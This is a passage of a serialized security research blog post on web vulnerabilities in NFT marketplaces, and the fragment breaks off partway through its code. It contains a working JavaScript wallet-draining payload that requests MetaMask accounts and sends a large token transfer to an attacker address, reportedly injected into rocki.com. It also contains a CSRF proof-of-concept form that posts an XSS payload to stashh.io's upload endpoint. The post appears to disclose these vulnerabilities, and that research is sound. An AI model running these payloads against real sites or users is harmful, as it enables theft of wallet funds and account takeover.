account.",{"type":28,"tag":29,"props":30962,"children":30963},{},[30964],{"type":28,"tag":206,"props":30965,"children":30967},{"alt":7,"src":30966},"/posts/web2-bug-repellant-instructions/xss.png",[],{"type":28,"tag":29,"props":30969,"children":30970},{},[30971],{"type":33,"value":30972},"Of course, this is merely a toy payload. An actual hacker could use this to spread through the marketplace, creating a wormable payload that takes over the entire website.",{"type":28,"tag":75,"props":30974,"children":30976},{"id":30975},"wheres-my-wallet",[30977],{"type":33,"value":30978},"Where's My Wallet",{"type":28,"tag":29,"props":30980,"children":30981},{},[30982],{"type":33,"value":30983},"What's the worst that can happen? How does losing your wallet funds sound?",{"type":28,"tag":29,"props":30985,"children":30986},{},[30987],{"type":33,"value":30988},"Note that triggering this exploit requires some interaction. However, in practice users likely are not carefully examining the wallet prompts, especially on familiar sites.",{"type":28,"tag":29,"props":30990,"children":30991},{},[30992],{"type":33,"value":30993},"It is important to recognize that the presence of XSS in marketplaces can trigger the approval prompt in various wallets, including the attacker's assets.",{"type":28,"tag":29,"props":30995,"children":30996},{},[30997],{"type":33,"value":30998},"In the following example, this malicious transaction was initiated by a malicious code injected into rocki.com.",{"type":28,"tag":201,"props":31000,"children":31001},{"style":203},[31002],{"type":28,"tag":206,"props":31003,"children":31007},{"src":31004,"alt":31005,"style":31006},"/posts/web2-bug-repellant-instructions/metamask.png","Wallet","max-height:550px;",[],{"type":28,"tag":29,"props":31009,"children":31010},{},[31011],{"type":33,"value":31012},"And here we can find the code used to achieve it :",{"type":28,"tag":234,"props":31014,"children":31018},{"className":31015,"code":31016,"language":31017,"meta":7,"style":7},"language-js shiki shiki-themes slack-dark","function request() {\n  if (typeof window.ethereum === 'undefined') {\n    console.error('Please install MetaMask to use this feature.');\n  } else {\n    ethereum.request({ method: 'eth_requestAccounts' }).then((accounts) => {\n      const fromAddress = accounts[0];\n      const attackerAddress = '0x0000000000000000000000000000000000000000';\n      const contractAddress = '0xa01000c52b234a92563ba61e5649b7c76e1ba0f3';\n\n      let tokenAbi = [\n        {\n          constant: false,\n          inputs: [\n            {\n              name: '_to',\n              type: 'address',\n            },\n            {\n              name: '_value',\n              type: 'uint256',\n            },\n          ],\n          name: 'transfer',\n          outputs: [\n            {\n              name: '',\n              type: 'bool',\n            },\n          ],\n          type: 'function',\n        },\n      ];\n\n      const web3 = new Web3(window.ethereum);\n\n      const tokenContract = new web3.eth.Contract(tokenAbi, contractAddress);\n\n      const transactionObject = {\n        from: fromAddress,\n        to: contractAddress,\n        data: tokenContract.methods\n          .transfer(attackerAddress, web3.utils.toWei('100000000', 'ether'))\n          .encodeABI(),\n      };\n\n      web3.eth.sendTransaction(transactionObject);\n    });\n  }\n}\n\nimport('https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.0.0-beta.36/dist/web3.min.js');\nsetTimeout(request, 1e3);\n","js",[31019],{"type":28,"tag":98,"props":31020,"children":31021},{"__ignoreMap":7},[31022,31038,31083,31112,31128,31189,31224,31249,31274,31281,31301,31309,31325,31337,31345,31362,31379,31387,31394,31410,31426,31433,31441,31458,31470,31477,31493,31509,31516,31523,31540,31547,31555,31562,31609,31616,31680,31687,31707,31723,31739,31760,31830,31846,31853,31860,31898,31906,31913,31920,31927,31947],{"type":28,"tag":116,"props":31023,"children":31024},{"class":245,"line":246},[31025,31029,31034],{"type":28,"tag":116,"props":31026,"children":31027},{"style":376},[31028],{"type":33,"value":830},{"type":28,"tag":116,"props":31030,"children":31031},{"style":282},[31032],{"type":33,"value":31033}," request",{"type":28,"tag":116,"props":31035,"children":31036},{"style":266},[31037],{"type":33,"value":1068},{"type":28,"tag":116,"props":31039,"children":31040},{"class":245,"line":256},[31041,31046,31050,31055,31060,31064,31069,31074,31079],{"type":28,"tag":116,"props":31042,"children":31043},{"style":260},[31044],{"type":33,"value":31045},"  if",{"type":28,"tag":116,"props":31047,"children":31048},{"style":266},[31049],{"type":33,"value":269},{"type":28,"tag":116,"props":31051,"children":31052},{"style":376},[31053],{"type":33,"value":31054},"typeof",{"type":28,"tag":116,"props":31056,"children":31057},{"style":272},[31058],{"type":33,"value":31059}," window",{"type":28,"tag":116,"props":31061,"children":31062},{"style":266},[31063],{"type":33,"value":141},{"type":28,"tag":116,"props":31065,"children":31066},{"style":272},[31067],{"type":33,"value":31068},"ethereum",{"type":28,"tag":116,"props":31070,"children":31071},{"style":370},[31072],{"type":33,"value":31073}," ===",{"type":28,"tag":116,"props":31075,"children":31076},{"style":563},[31077],{"type":33,"value":31078}," 'undefined'",{"type":28,"tag":116,"props":31080,"children":31081},{"style":266},[31082],{"type":33,"value":844},{"type":28,"tag":116,"props":31084,"children":31085},{"class":245,"line":293},[31086,31091,31095,31099,31103,31108],{"type":28,"tag":116,"props":31087,"children":31088},{"style":272},[31089],{"type":33,"value":31090},"    console",{"type":28,"tag":116,"props":31092,"children":31093},{"style":266},[31094],{"type":33,"value":141},{"type":28,"tag":116,"props":31096,"children":31097},{"style":282},[31098],{"type":33,"value":974},{"type":28,"tag":116,"props":31100,"children":31101},{"style":266},[31102],{"type":33,"value":313},{"type":28,"tag":116,"props":31104,"children":31105},{"style":563},[31106],{"type":33,"value":31107},"'Please install MetaMask to use this feature.'",{"type":28,"tag":116,"props":31109,"children":31110},{"style":266},[31111],{"type":33,"value":895},{"type":28,"tag":116,"props":31113,"children":31114},{"class":245,"line":361},[31115,31120,31124],{"type":28,"tag":116,"props":31116,"children":31117},{"style":266},[31118],{"type":33,"value":31119},"  } ",{"type":28,"tag":116,"props":31121,"children":31122},{"style":260},[31123],{"type":33,"value":2986},{"type":28,"tag":116,"props":31125,"children":31126},{"style":266},[31127],{"type":33,"value":1291},{"type":28,"tag":116,"props":31129,"children":31130},{"class":245,"line":387},[31131,31136,31140,31145,31149,31154,31159,31164,31169,31173,31177,31181,31185],{"type":28,"tag":116,"props":31132,"children":31133},{"style":272},[31134],{"type":33,"value":31135},"    ethereum",{"type":28,"tag":116,"props":31137,"children":31138},{"style":266},[31139],{"type":33,"value":141},{"type":28,"tag":116,"props":31141,"children":31142},{"style":282},[31143],{"type":33,"value":31144},"request",{"type":28,"tag":116,"props":31146,"children":31147},{"style":266},[31148],{"type":33,"value":1119},{"type":28,"tag":116,"props":31150,"children":31151},{"style":272},[31152],{"type":33,"value":31153},"method:",{"type":28,"tag":116,"props":31155,"children":31156},{"style":563},[31157],{"type":33,"value":31158}," 'eth_requestAccounts'",{"type":28,"tag":116,"props":31160,"children":31161},{"style":266},[31162],{"type":33,"value":31163}," }).",{"type":28,"tag":116,"props":31165,"children":31166},{"style":282},[31167],{"type":33,"value":31168},"then",{"type":28,"tag":116,"props":31170,"children":31171},{"style":266},[31172],{"type":33,"value":1599},{"type":28,"tag":116,"props":31174,"children":31175},{"style":272},[31176],{"type":33,"value":14341},{"type":28,"tag":116,"props":31178,"children":31179},{"style":266},[31180],{"type":33,"value":1609},{"type":28,"tag":116,"props":31182,"children":31183},{"style":376},[31184],{"type":33,"value":1286},{"type":28,"tag":116,"props":31186,"children":31187},{"style":266},[31188],{"type":33,"value":1291},{"type":28,"tag":116,"props":31190,"children":31191},{"class":245,"line":400},[31192,31197,31202,31206,31211,31215,31219],{"type":28,"tag":116,"props":31193,"children":31194},{"style":376},[31195],{"type":33,"value":31196},"      const",{"type":28,"tag":116,"props":31198,"children":31199},{"style":272},[31200],{"type":33,"value":31201}," fromAddress",{"type":28,"tag":116,"props":31203,"children":31204},{"style":370},[31205],{"type":33,"value":2226},{"type":28,"tag":116,"props":31207,"children":31208},{"style":272},[31209],{"type":33,"value":31210}," accounts",{"type":28,"tag":116,"props":31212,"children":31213},{"style":266},[31214],{"type":33,"value":347},{"type":28,"tag":116,"props":31216,"children":31217},{"style":350},[31218],{"type":33,"value":353},{"type":28,"tag":116,"props":31220,"children":31221},{"style":266},[31222],{"type":33,"value":31223},"];\n",{"type":28,"tag":116,"props":31225,"children":31226},{"class":245,"line":614},[31227,31231,31236,31240,31245],{"type":28,"tag":116,"props":31228,"children":31229},{"style":376},[31230],{"type":33,"value":31196},{"type":28,"tag":116,"props":31232,"children":31233},{"style":272},[31234],{"type":33,"value":31235}," attackerAddress",{"type":28,"tag":116,"props":31237,"children":31238},{"style":370},[31239],{"type":33,"value":2226},{"type":28,"tag":116,"props":31241,"children":31242},{"style":563},[31243],{"type":33,"value":31244}," '0x0000000000000000000000000000000000000000'",{"type":28,"tag":116,"props":31246,"children":31247},{"style":266},[31248],{"type":33,"value":384},{"type":28,"tag":116,"props":31250,"children":31251},{"class":245,"line":631},[31252,31256,31261,31265,31270],{"type":28,"tag":116,"props":31253,"children":31254},{"style":376},[31255],{"type":33,"value":31196},{"type":28,"tag":116,"props":31257,"children":31258},{"style":272},[31259],{"type":33,"value":31260}," contractAddress",{"type":28,"tag":116,"props":31262,"children":31263},{"style":370},[31264],{"type":33,"value":2226},{"type":28,"tag":116,"props":31266,"children":31267},{"style":563},[31268],{"type":33,"value":31269}," '0xa01000c52b234a92563ba61e5649b7c76e1ba0f3'",{"type":28,"tag":116,"props":31271,"children":31272},{"style":266},[31273],{"type":33,"value":384},{"type":28,"tag":116,"props":31275,"children":31276},{"class":245,"line":665},[31277],{"type":28,"tag":116,"props":31278,"children":31279},{"emptyLinePlaceholder":19},[31280],{"type":33,"value":1044},{"type":28,"tag":116,"props":31282,"children":31283},{"class":245,"line":713},[31284,31288,31293,31297],{"type":28,"tag":116,"props":31285,"children":31286},{"style":376},[31287],{"type":33,"value":7747},{"type":28,"tag":116,"props":31289,"children":31290},{"style":272},[31291],{"type":33,"value":31292}," tokenAbi",{"type":28,"tag":116,"props":31294,"children":31295},{"style":370},[31296],{"type":33,"value":2226},{"type":28,"tag":116,"props":31298,"children":31299},{"style":266},[31300],{"type":33,"value":25276},{"type":28,"tag":116,"props":31302,"children":31303},{"class":245,"line":750},[31304],{"type":28,"tag":116,"props":31305,"children":31306},{"style":266},[31307],{"type":33,"value":31308},"        {\n",{"type":28,"tag":116,"props":31310,"children":31311},{"class":245,"line":779},[31312,31317,31321],{"type":28,"tag":116,"props":31313,"children":31314},{"style":272},[31315],{"type":33,"value":31316},"          constant:",{"type":28,"tag":116,"props":31318,"children":31319},{"style":376},[31320],{"type":33,"value":1022},{"type":28,"tag":116,"props":31322,"children":31323},{"style":266},[31324],{"type":33,"value":3178},{"type":28,"tag":116,"props":31326,"children":31327},{"class":245,"line":796},[31328,31333],{"type":28,"tag":116,"props":31329,"children":31330},{"style":272},[31331],{"type":33,"value":31332},"          inputs:",{"type":28,"tag":116,"props":31334,"children":31335},{"style":266},[31336],{"type":33,"value":25276},{"type":28,"tag":116,"props":31338,"children":31339},{"class":245,"line":847},[31340],{"type":28,"tag":116,"props":31341,"children":31342},{"style":266},[31343],{"type":33,"value":31344},"            {\n",{"type":28,"tag":116,"props":31346,"children":31347},{"class":245,"line":898},[31348,31353,31358],{"type":28,"tag":116,"props":31349,"children":31350},{"style":272},[31351],{"type":33,"value":31352},"              name:",{"type":28,"tag":116,"props":31354,"children":31355},{"style":563},[31356],{"type":33,"value":31357}," '_to'",{"type":28,"tag":116,"props":31359,"children":31360},{"style":266},[31361],{"type":33,"value":3178},{"type":28,"tag":116,"props":31363,"children":31364},{"class":245,"line":907},[31365,31370,31375],{"type":28,"tag":116,"props":31366,"children":31367},{"style":272},[31368],{"type":33,"value":31369},"              type:",{"type":28,"tag":116,"props":31371,"children":31372},{"style":563},[31373],{"type":33,"value":31374}," 'address'",{"type":28,"tag":116,"props":31376,"children":31377},{"style":266},[31378],{"type":33,"value":3178},{"type":28,"tag":116,"props":31380,"children":31381},{"class":245,"line":981},[31382],{"type":28,"tag":116,"props":31383,"children":31384},{"style":266},[31385],{"type":33,"value":31386},"            },\n",{"type":28,"tag":116,"props":31388,"children":31389},{"class":245,"line":1011},[31390],{"type":28,"tag":116,"props":31391,"children":31392},{"style":266},[31393],{"type":33,"value":31344},{"type":28,"tag":116,"props":31395,"children":31396},{"class":245,"line":1029},[31397,31401,31406],{"type":28,"tag":116,"props":31398,"children":31399},{"style":272},[31400],{"type":33,"value":31352},{"type":28,"tag":116,"props":31402,"children":31403},{"style":563},[31404],{"type":33,"value":31405}," '_value'",{"type":28,"tag":116,"props":31407,"children":31408},{"style":266},[31409],{"type":33,"value":3178},{"type":28,"tag":116,"props":31411,"children":31412},{"class":245,"line":1038},[31413,31417,31422],{"type":28,"tag":116,"props":31414,"children":31415},{"style":272},[31416],{"type":33,"value":31369},{"type":28,"tag":116,"props":31418,"children":31419},{"style":563},[31420],{"type":33,"value":31421}," 'uint256'",{"type":28,"tag":116,"props":31423,"children":31424},{"style":266},[31425],{"type":33,"value":3178},{"type":28,"tag":116,"props":31427,"children":31428},{"class":245,"line":1047},[31429],{"type":28,"tag":116,"props":31430,"children":31431},{"style":266},[31432],{"type":33,"value":31386},{"type":28,"tag":116,"props":31434,"children":31435},{"class":245,"line":1071},[31436],{"type":28,"tag":116,"props":31437,"children":31438},{"style":266},[31439],{"type":33,"value":31440},"          ],\n",{"type":28,"tag":116,"props":31442,"children":31443},{"class":245,"line":1137},[31444,31449,31454],{"type":28,"tag":116,"props":31445,"children":31446},{"style":272},[31447],{"type":33,"value":31448},"          name:",{"type":28,"tag":116,"props":31450,"children":31451},{"style":563},[31452],{"type":33,"value":31453}," 'transfer'",{"type":28,"tag":116,"props":31455,"children":31456},{"style":266},[31457],{"type":33,"value":3178},{"type":28,"tag":116,"props":31459,"children":31460},{"class":245,"line":1181},[31461,31466],{"type":28,"tag":116,"props":31462,"children":31463},{"style":272},[31464],{"type":33,"value":31465},"          outputs:",{"type":28,"tag":116,"props":31467,"children":31468},{"style":266},[31469],{"type":33,"value":25276},{"type":28,"tag":116,"props":31471,"children":31472},{"class":245,"line":1212},[31473],{"type":28,"tag":116,"props":31474,"children":31475},{"style":266},[31476],{"type":33,"value":31344},{"type":28,"tag":116,"props":31478,"children":31479},{"class":245,"line":1254},[31480,31484,31489],{"type":28,"tag":116,"props":31481,"children":31482},{"style":272},[31483],{"type":33,"value":31352},{"type":28,"tag":116,"props":31485,"children":31486},{"style":563},[31487],{"type":33,"value":31488}," ''",{"type":28,"tag":116,"props":31490,"children":31491},{"style":266},[31492],{"type":33,"value":3178},{"type":28,"tag":116,"props":31494,"children":31495},{"class":245,"line":1262},[31496,31500,31505],{"type":28,"tag":116,"props":31497,"children":31498},{"style":272},[31499],{"type":33,"value":31369},{"type":28,"tag":116,"props":31501,"children":31502},{"style":563},[31503],{"type":33,"value":31504}," 'bool'",{"type":28,"tag":116,"props":31506,"children":31507},{"style":266},[31508],{"type":33,"value":3178},{"type":28,"tag":116,"props":31510,"children":31511},{"class":245,"line":1294},[31512],{"type":28,"tag":116,"props":31513,"children":31514},{"style":266},[31515],{"type":33,"value":31386},{"type":28,"tag":116,"props":31517,"children":31518},{"class":245,"line":1334},[31519],{"type":28,"tag":116,"props":31520,"children":31521},{"style":266},[31522],{"type":33,"value":31440},{"type":28,"tag":116,"props":31524,"children":31525},{"class":245,"line":1372},[31526,31531,31536],{"type":28,"tag":116,"props":31527,"children":31528},{"style":272},[31529],{"type":33,"value":31530},"          type:",{"type":28,"tag":116,"props":31532,"children":31533},{"style":563},[31534],{"type":33,"value":31535}," 'function'",{"type":28,"tag":116,"props":31537,"children":31538},{"style":266},[31539],{"type":33,"value":3178},{"type":28,"tag":116,"props":31541,"children":31542},{"class":245,"line":1381},[31543],{"type":28,"tag":116,"props":31544,"children":31545},{"style":266},[31546],{"type":33,"value":25028},{"type":28,"tag":116,"props":31548,"children":31549},{"class":245,"line":1389},[31550],{"type":28,"tag":116,"props":31551,"children":31552},{"style":266},[31553],{"type":33,"value":31554},"      ];\n",{"type":28,"tag":116,"props":31556,"children":31557},{"class":245,"line":1425},[31558],{"type":28,"tag":116,"props":31559,"children":31560},{"emptyLinePlaceholder":19},[31561],{"type":33,"value":1044},{"type":28,"tag":116,"props":31563,"children":31564},{"class":245,"line":1448},[31565,31569,31574,31578,31583,31588,31592,31597,31601,31605],{"type":28,"tag":116,"props":31566,"children":31567},{"style":376},[31568],{"type":33,"value":31196},{"type":28,"tag":116,"props":31570,"children":31571},{"style":272},[31572],{"type":33,"value":31573}," web3",{"type":28,"tag":116,"props":31575,"children":31576},{"style":370},[31577],{"type":33,"value":2226},{"type":28,"tag":116,"props":31579,"children":31580},{"style":376},[31581],{"type":33,"value":31582}," new",{"type":28,"tag":116,"props":31584,"children":31585},{"style":282},[31586],{"type":33,"value":31587}," Web3",{"type":28,"tag":116,"props":31589,"children":31590},{"style":266},[31591],{"type":33,"value":313},{"type":28,"tag":116,"props":31593,"children":31594},{"style":272},[31595],{"type":33,"value":31596},"window",{"type":28,"tag":116,"props":31598,"children":31599},{"style":266},[31600],{"type":33,"value":141},{"type":28,"tag":116,"props":31602,"children":31603},{"style":272},[31604],{"type":33,"value":31068},{"type":28,"tag":116,"props":31606,"children":31607},{"style":266},[31608],{"type":33,"value":895},{"type":28,"tag":116,"props":31610,"children":31611},{"class":245,"line":1456},[31612],{"type":28,"tag":116,"props":31613,"children":31614},{"emptyLinePlaceholder":19},[31615],{"type":33,"value":1044},{"type":28,"tag":116,"props":31617,"children":31618},{"class":245,"line":1520},[31619,31623,31628,31632,31636,31640,31644,31649,31653,31658,31662,31667,31671,31676],{"type":28,"tag":116,"props":31620,"children":31621},{"style":376},[31622],{"type":33,"value":31196},{"type":28,"tag":116,"props":31624,"children":31625},{"style":272},[31626],{"type":33,"value":31627}," tokenContract",{"type":28,"tag":116,"props":31629,"children":31630},{"style":370},[31631],{"type":33,"value":2226},{"type":28,"tag":116,"props":31633,"children":31634},{"style":376},[31635],{"type":33,"value":31582},{"type":28,"tag":116,"props":31637,"children":31638},{"style":272},[31639],{"type":33,"value":31573},{"type":28,"tag":116,"props":31641,"children":31642},{"style":266},[31643],{"type":33,"value":141},{"type":28,"tag":116,"props":31645,"children":31646},{"style":272},[31647],{"type":33,"value":31648},"eth",{"type":28,"tag":116,"props":31650,"children":31651},{"style":266},[31652],{"type":33,"value":141},{"type":28,"tag":116,"props":31654,"children":31655},{"style":282},[31656],{"type":33,"value":31657},"Contract",{"type":28,"tag":116,"props":31659,"children":31660},{"style":266},[31661],{"type":33,"value":313},{"type":28,"tag":116,"props":31663,"children":31664},{"style":272},[31665],{"type":33,"value":31666},"tokenAbi",{"type":28,"tag":116,"props":31668,"children":31669},{"style":266},[31670],{"type":33,"value":825},{"type":28,"tag":116,"props":31672,"children":31673},{"style":272},[31674],{"type":33,"value":31675},"contractAddress",{"type":28,"tag":116,"props":31677,"children":31678},{"style":266},[31679],{"type":33,"value":895},{"type":28,"tag":116,"props":31681,"children":31682},{"class":245,"line":1580},[31683],{"type":28,"tag":116,"props":31684,"children":31685},{"emptyLinePlaceholder":19},[31686],{"type":33,"value":1044},{"type":28,"tag":116,"props":31688,"children":31689},{"class":245,"line":1620},[31690,31694,31699,31703],{"type":28,"tag":116,"props":31691,"children":31692},{"style":376},[31693],{"type":33,"value":31196},{"type":28,"tag":116,"props":31695,"children":31696},{"style":272},[31697],{"type":33,"value":31698}," transactionObject",{"type":28,"tag":116,"props":31700,"children":31701},{"style":370},[31702],{"type":33,"value":2226},{"type":28,"tag":116,"props":31704,"children":31705},{"style":266},[31706],{"type":33,"value":1291},{"type":28,"tag":116,"props":31708,"children":31709},{"class":245,"line":1668},[31710,31715,31719],{"type":28,"tag":116,"props":31711,"children":31712},{"style":272},[31713],{"type":33,"value":31714},"        from:",{"type":28,"tag":116,"props":31716,"children":31717},{"style":272},[31718],{"type":33,"value":31201},{"type":28,"tag":116,"props":31720,"children":31721},{"style":266},[31722],{"type":33,"value":3178},{"type":28,"tag":116,"props":31724,"children":31725},{"class":245,"line":1677},[31726,31731,31735],{"type":28,"tag":116,"props":31727,"children":31728},{"style":272},[31729],{"type":33,"value":31730},"        to:",{"type":28,"tag":116,"props":31732,"children":31733},{"style":272},[31734],{"type":33,"value":31260},{"type":28,"tag":116,"props":31736,"children":31737},{"style":266},[31738],{"type":33,"value":3178},{"type":28,"tag":116,"props":31740,"children":31741},{"class":245,"line":1685},[31742,31747,31751,31755],{"type":28,"tag":116,"props":31743,"children":31744},{"style":272},[31745],{"type":33,"value":31746},"        data:",{"type":28,"tag":116,"props":31748,"children":31749},{"style":272},[31750],{"type":33,"value":31627},{"type":28,"tag":116,"props":31752,"children":31753},{"style":266},[31754],{"type":33,"value":141},{"type":28,"tag":116,"props":31756,"children":31757},{"style":272},[31758],{"type":33,"value":31759},"methods\n",{"type":28,"tag":116,"props":31761,"children":31762},{"class":245,"line":1729},[31763,31768,31773,31777,31782,31786,31790,31794,31799,31803,31808,31812,31817,31821,31826],{"type":28,"tag":116,"props":31764,"children":31765},{"style":266},[31766],{"type":33,"value":31767},"          .",{"type":28,"tag":116,"props":31769,"children":31770},{"style":282},[31771],{"type":33,"value":31772},"transfer",{"type":28,"tag":116,"props":31774,"children":31775},{"style":266},[31776],{"type":33,"value":313},{"type":28,"tag":116,"props":31778,"children":31779},{"style":272},[31780],{"type":33,"value":31781},"attackerAddress",{"type":28,"tag":116,"props":31783,"children":31784},{"style":266},[31785],{"type":33,"value":825},{"type":28,"tag":116,"props":31787,"children":31788},{"style":272},[31789],{"type":33,"value":21},{"type":28,"tag":116,"props":31791,"children":31792},{"style":266},[31793],{"type":33,"value":141},{"type":28,"tag":116,"props":31795,"children":31796},{"style":272},[31797],{"type":33,"value":31798},"utils",{"type":28,"tag":116,"props":31800,"children":31801},{"style":266},[31802],{"type":33,"value":141},{"type":28,"tag":116,"props":31804,"children":31805},{"style":282},[31806],{"type":33,"value":31807},"toWei",{"type":28,"tag":116,"props":31809,"children":31810},{"style":266},[31811],{"type":33,"value":313},{"type":28,"tag":116,"props":31813,"children":31814},{"style":563},[31815],{"type":33,"value":31816},"'100000000'",{"type":28,"tag":116,"props":31818,"children":31819},{"style":266},[31820],{"type":33,"value":825},{"type":28,"tag":116,"props":31822,"children":31823},{"style":563},[31824],{"type":33,"value":31825},"'ether'",{"type":28,"tag":116,"props":31827,"children":31828},{"style":266},[31829],{"type":33,"value":19376},{"type":28,"tag":116,"props":31831,"children":31832},{"class":245,"line":1764},[31833,31837,31842],{"type":28,"tag":116,"props":31834,"children":31835},{"style":266},[31836],{"type":33,"value":31767},{"type":28,"tag":116,"props":31838,"children":31839},{"style":282},[31840],{"type":33,"value":31841},"encodeABI",{"type":28,"tag":116,"props":31843,"children":31844},{"style":266},[31845],{"type":33,"value":3161},{"type":28,"tag":116,"props":31847,"children":31848},{"class":245,"line":1896},[31849],{"type":28,"tag":116,"props":31850,"children":31851},{"style":266},[31852],{"type":33,"value":8591},{"type":28,"tag":116,"props":31854,"children":31855},{"class":245,"line":1932},[31856],{"type":28,"tag":116,"props":31857,"children":31858},{"emptyLinePlaceholder":19},[31859],{"type":33,"value":1044},{"type":28,"tag":116,"props":31861,"children":31862},{"class":245,"line":1940},[31863,31868,31872,31876,31880,31885,31889,31894],{"type":28,"tag":116,"props":31864,"children":31865},{"style":272},[31866],{"type":33,"value":31867},"      web3",{"type":28,"tag":116,"props":31869,"children":31870},{"style":266},[31871],{"type":33,"value":141},{"type":28,"tag":116,"props":31873,"children":31874},{"style":272},[31875],{"type":33,"value":31648},{"type":28,"tag":116,"props":31877,"children":31878},{"style":266},[31879],{"type":33,"value":141},{"type":28,"tag":116,"props":31881,"children":31882},{"style":282},[31883],{"type":33,"value":31884},"sendTransaction",{"type":28,"tag":116,"props":31886,"children":31887},{"style":266},[31888],{"type":33,"value":313},{"type":28,"tag":116,"props":31890,"children":31891},{"style":272},[31892],{"type":33,"value":31893},"transactionObject",{"type":28,"tag":116,"props":31895,"children":31896},{"style":266},[31897],{"type":33,"value":895},{"type":28,"tag":116,"props":31899,"children":31900},{"class":245,"line":1948},[31901],{"type":28,"tag":116,"props":31902,"children":31903},{"style":266},[31904],{"type":33,"value":31905},"    });\n",{"type":28,"tag":116,"props":31907,"children":31908},{"class":245,"line":1957},[31909],{"type":28,"tag":116,"props":31910,"children":31911},{"style":266},[31912],{"type":33,"value":5543},{"type":28,"tag":116,"props":31914,"children":31915},{"class":245,"line":1970},[31916],{"type":28,"tag":116,"props":31917,"children":31918},{"style":266},[31919],{"type":33,"value":406},{"type":28,"tag":116,"props":31921,"children":31922},{"class":245,"line":1987},[31923],{"type":28,"tag":116,"props":31924,"children":31925},{"emptyLinePlaceholder":19},[31926],{"type":33,"value":1044},{"type":28,"tag":116,"props":31928,"children":31929},{"class":245,"line":2003},[31930,31934,31938,31943],{"type":28,"tag":116,"props":31931,"children":31932},{"style":376},[31933],{"type":33,"value":19147},{"type":28,"tag":116,"props":31935,"children":31936},{"style":266},[31937],{"type":33,"value":313},{"type":28,"tag":116,"props":31939,"children":31940},{"style":563},[31941],{"type":33,"value":31942},"'https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.0.0-beta.36/dist/web3.min.js'",{"type":28,"tag":116,"props":31944,"children":31945},{"style":266},[31946],{"type":33,"value":895},{"type":28,"tag":116,"props":31948,"children":31950},{"class":245,"line":31949},52,[31951,31956,31960,31964,31968,31973],{"type":28,"tag":116,"props":31952,"children":31953},{"style":282},[31954],{"type":33,"value":31955},"setTimeout",{"type":28,"tag":116,"props":31957,"children":31958},{"style":266},[31959],{"type":33,"value":313},{"type":28,"tag":116,"props":31961,"children":31962},{"style":272},[31963],{"type":33,"value":31144},{"type":28,"tag":116,"props":31965,"children":31966},{"style":266},[31967],{"type":33,"value":825},{"type":28,"tag":116,"props":31969,"children":31970},{"style":350},[31971],{"type":33,"value":31972},"1e3",{"type":28,"tag":116,"props":31974,"children":31975},{"style":266},[31976],{"type":33,"value":895},{"type":28,"tag":29,"props":31978,"children":31979},{},[31980,31985],{"type":28,"tag":4995,"props":31981,"children":31982},{},[31983],{"type":33,"value":31984},"CSRF & XSS",{"type":33,"value":31986},"\nWe continued our investigation of potential XSS vulnerabilities by exploring various sinks, such as common field errors and the handling of file uploads in different marketplaces.",{"type":28,"tag":29,"props":31988,"children":31989},{},[31990,31992,31997],{"type":33,"value":31991},"Our attention was drawn to ",{"type":28,"tag":87,"props":31993,"children":31995},{"href":30934,"rel":31994},[91],[31996],{"type":33,"value":30938},{"type":33,"value":31998},", an online platform that allows users to upload images. During the image uploading process, we noticed that certain parameters were being sent in the request, as shown below:",{"type":28,"tag":29,"props":32000,"children":32001},{},[32002],{"type":28,"tag":206,"props":32003,"children":32005},{"alt":7,"src":32004},"/posts/web2-bug-repellant-instructions/csrf.png",[],{"type":28,"tag":29,"props":32007,"children":32008},{},[32009],{"type":33,"value":32010},"and here there is the code:",{"type":28,"tag":234,"props":32012,"children":32014},{"className":31015,"code":32013,"language":31017,"meta":7,"style":7},"\u003Chtml>\n  \u003Cbody>\n  \u003Cscript>history.pushState('', '', '/')\u003C/script>\n    \u003Cform id=\"form123\" action=\"https://stashh.io/upload_asset\" method=\"POST\" enctype=\"multipart/form-data\" value=\"asd\">\n     \u003Cinput type=\"file\" name=\"data\" id=\"file123\">\n      \u003Cinput type=\"hidden\" name=\"config\" value=\"{"address":"secret1k6tng55v0zgufpcx8wa2w33asl82fhx84tn3hq<img/src=x onerror=alert(document.domain)>","to":"profile-assets","type":"icon"}\" />\n      \u003Cinput type=\"submit\" value=\"Submit request\" />\n    \u003C/form>\n  \u003C/body>\n\n  \u003Cscript>\n\n    (async ()=>{\n        const blob = await (await fetch(\"/sapo.png\")).blob()\n\n        let f = new File([blob], 'sapo.png', {type: 'image/png'})\n        const dataTransfer = new DataTransfer();\n        dataTransfer.items.add(f);\n\n        file123.files = dataTransfer.files;\n    })()\n\n  \u003C/script>\n\u003C/html>\n",[32015],{"type":28,"tag":98,"props":32016,"children":32017},{"__ignoreMap":7},[32018,32033,32049,32081,32165,32222,32418,32459,32474,32490,32497,32512,32519,32531,32587,32594,32657,32686,32724,32731,32769,32782,32789,32804],{"type":28,"tag":116,"props":32019,"children":32020},{"class":245,"line":246},[32021,32025,32029],{"type":28,"tag":116,"props":32022,"children":32023},{"style":488},[32024],{"type":33,"value":514},{"type":28,"tag":116,"props":32026,"children":32027},{"style":376},[32028],{"type":33,"value":478},{"type":28,"tag":116,"props":32030,"children":32031},{"style":488},[32032],{"type":33,"value":506},{"type":28,"tag":116,"props":32034,"children":32035},{"class":245,"line":256},[32036,32041,32045],{"type":28,"tag":116,"props":32037,"children":32038},{"style":488},[32039],{"type":33,"value":32040},"  \u003C",{"type":28,"tag":116,"props":32042,"children":32043},{"style":376},[32044],{"type":33,"value":624},{"type":28,"tag":116,"props":32046,"children":32047},{"style":488},[32048],{"type":33,"value":506},{"type":28,"tag":116,"props":32050,"children":32051},{"class":245,"line":293},[32052,32056,32060,32064,32069,32073,32077],{"type":28,"tag":116,"props":32053,"children":32054},{"style":488},[32055],{"type":33,"value":32040},{"type":28,"tag":116,"props":32057,"children":32058},{"style":376},[32059],{"type":33,"value":789},{"type":28,"tag":116,"props":32061,"children":32062},{"style":488},[32063],{"type":33,"value":645},{"type":28,"tag":116,"props":32065,"children":32066},{"style":266},[32067],{"type":33,"value":32068},"history.pushState('', '', 